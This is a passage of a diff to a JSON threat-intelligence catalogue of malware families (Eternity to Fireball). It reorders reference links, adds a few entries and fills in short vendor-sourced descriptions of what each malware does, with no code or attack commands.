- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
- "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/"
+ "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22514,9 +23910,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_ransomware",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/"
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22529,13 +23925,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_stealer",
- "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
"https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/",
"https://twitter.com/3xp0rtblog/status/1509601846494695438",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on",
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://ke-la.com/information-stealers-a-new-landscape/"
+ "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/",
+ "https://blog.morphisec.com/nft-malware-new-evasion-abilities"
],
"synonyms": [],
"type": []
@@ -22548,9 +23947,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_worm",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/"
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22563,24 +23962,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot",
- "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html",
+ "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise",
"https://www.secureworks.com/research/threat-profiles/bronze-globe",
- "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise"
+ "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
],
"synonyms": [
"HighTide"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "91583583-95c0-444e-8175-483cbebc640b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "91af1080-6378-4a90-ba1e-78634cd31efe",
"value": "EtumBot"
},
@@ -22589,8 +23979,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny",
- "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
+ "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/"
],
"synonyms": [],
@@ -22599,6 +23989,20 @@
"uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3",
"value": "Evilbunny"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilextractor",
+ "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics",
+ "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e020212b-03ef-4168-97f5-bb72ff627d94",
+ "value": "EvilExtractor"
+ },
{
"description": "",
"meta": {
@@ -22613,15 +24017,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c9b4ec27-0a43-4671-a967-bcac5df0e056",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
"value": "EvilGrab"
},
@@ -22630,12 +24025,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions",
- "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions",
"https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A"
],
"synonyms": [],
@@ -22690,13 +24085,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
"https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
"https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://attack.mitre.org/groups/G0034",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -22704,6 +24099,19 @@
"uuid": "dd68abd7-b20a-40a5-be53-ae8d45c1dd27",
"value": "Exaramel (Windows)"
},
+ {
+ "description": "ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "42f4fee9-a5c2-4643-be56-fba8700f835d",
+ "value": "ExByte"
+ },
{
"description": "",
"meta": {
@@ -22726,8 +24134,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://github.com/nccgroup/Royal_APT"
+ "https://github.com/nccgroup/Royal_APT",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
@@ -22753,8 +24161,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exmatter",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool",
+ "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack",
+ "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://twitter.com/knight0x07/status/1461787168037240834?s=20"
],
"synonyms": [],
@@ -22781,10 +24191,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro",
- "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro",
+ "https://youtu.be/3RYbkORtFnk",
"https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro"
+ "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/"
],
"synonyms": [
"Xpiro"
@@ -22796,18 +24207,31 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d3600857-b941-4d47-81ef-02c168396518",
+ "value": "ExplosiveRAT"
+ },
+ {
+ "description": "According to Trend MIcro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT has been used in attacks targeting Israeli and Syrian governments last 2012.\r\n\r\nThis malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat",
+ "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1",
+ "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
+ "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
"https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
"https://blogs.360.cn/post/APT-C-44.html",
"https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
- "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
- "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat",
- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html",
- "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1"
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat"
],
"synonyms": [
"ExtRat"
@@ -22822,8 +24246,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid",
- "http://blog.talosintel.com/2017/01/Eye-Pyramid.html",
- "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/"
+ "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/",
+ "http://blog.talosintel.com/2017/01/Eye-Pyramid.html"
],
"synonyms": [],
"type": []
@@ -22836,11 +24260,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice",
- "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/",
- "https://www.epicturla.com/blog/the-lost-nazar",
+ "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://blog.malwarelab.pl/posts/nazar_eyservice/",
- "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/"
+ "https://www.epicturla.com/blog/the-lost-nazar",
+ "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/"
],
"synonyms": [],
"type": []
@@ -22848,6 +24272,20 @@
"uuid": "9b287426-e82f-407e-8d12-42dac4241bf8",
"value": "EYService"
},
+ {
+ "description": "Fabookie is facebook account info stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie",
+ "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "782aa125-42ff-4ca0-b9b1-362aac08566b",
+ "value": "Fabookie"
+ },
{
"description": "",
"meta": {
@@ -22912,10 +24350,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny",
- "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1",
"https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
"https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
"https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/"
@@ -22925,20 +24363,11 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1e25d254-3f03-4752-b8d6-023a23e7d4ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e",
"value": "Fanny"
},
{
- "description": "",
+ "description": "According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the \".locked4\", \".fantom\" or \".locked\" extension.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt",
@@ -22955,9 +24384,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer",
+ "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/",
"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/"
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/"
],
"synonyms": [],
"type": []
@@ -22982,11 +24411,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos",
- "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
"http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/",
- "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf"
+ "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
+ "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/"
],
"synonyms": [],
"type": []
@@ -22995,14 +24424,14 @@
"value": "FastPOS"
},
{
- "description": "",
+ "description": "According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.\r\n\r\nTypically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).\r\n\r\nThere are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
"https://www.youtube.com/watch?v=gjvnVZc11Vg",
- "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
- "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis"
+ "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
+ "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
],
"synonyms": [],
"type": []
@@ -23024,6 +24453,19 @@
"uuid": "4325c84b-9a9b-4e7c-977f-20d7ae817b7e",
"value": "FatDuke"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fauppod",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e363918a-92ec-49c0-b3b2-1d339200417b",
+ "value": "Fauppod"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -23055,8 +24497,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot",
- "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html",
"https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257"
],
"synonyms": [],
@@ -23083,10 +24526,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo",
- "https://feodotracker.abuse.ch/",
"http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html",
- "https://en.wikipedia.org/wiki/Maksim_Yakubets",
"http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
+ "https://en.wikipedia.org/wiki/Maksim_Yakubets",
+ "https://feodotracker.abuse.ch/",
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/"
],
"synonyms": [
@@ -23095,20 +24538,11 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "372cdc12-d909-463c-877a-175f97f7abb5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "66781866-f064-467d-925d-5e5f290352f0",
"value": "Feodo"
},
{
- "description": "",
+ "description": "According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider",
@@ -23122,19 +24556,19 @@
"value": "FFDroider"
},
{
- "description": "",
+ "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware",
"https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market",
"https://twitter.com/3xp0rtblog/status/1321209656774135810",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf"
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware",
+ "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -23160,8 +24594,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems"
],
"synonyms": [],
"type": []
@@ -23188,8 +24622,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blogs.cisco.com/security/talos/poseidon",
- "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/"
+ "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
+ "https://blogs.cisco.com/security/talos/poseidon"
],
"synonyms": [
"Poseidon"
@@ -23204,27 +24638,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher",
- "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
- "https://securelist.com/finspy-unseen-findings/104322/",
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/",
- "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization",
"https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization",
- "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
- "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye",
- "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2",
- "https://github.com/RolfRolles/FinSpyVM",
- "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html",
- "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/",
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues",
+ "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2",
+ "https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/",
+ "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye",
+ "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization",
+ "https://github.com/RolfRolles/FinSpyVM",
+ "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization",
+ "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
+ "https://securelist.com/finspy-unseen-findings/104322/"
],
"synonyms": [
"FinSpy"
@@ -23244,15 +24679,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "968df869-7f60-4420-989f-23dfdbd58668",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9ad28356-184c-4f02-89f5-1b70981598c3",
"value": "Fireball"
},
@@ -23306,15 +24732,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6ef11b6e-d81a-465b-9dce-fab5c6fe807b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
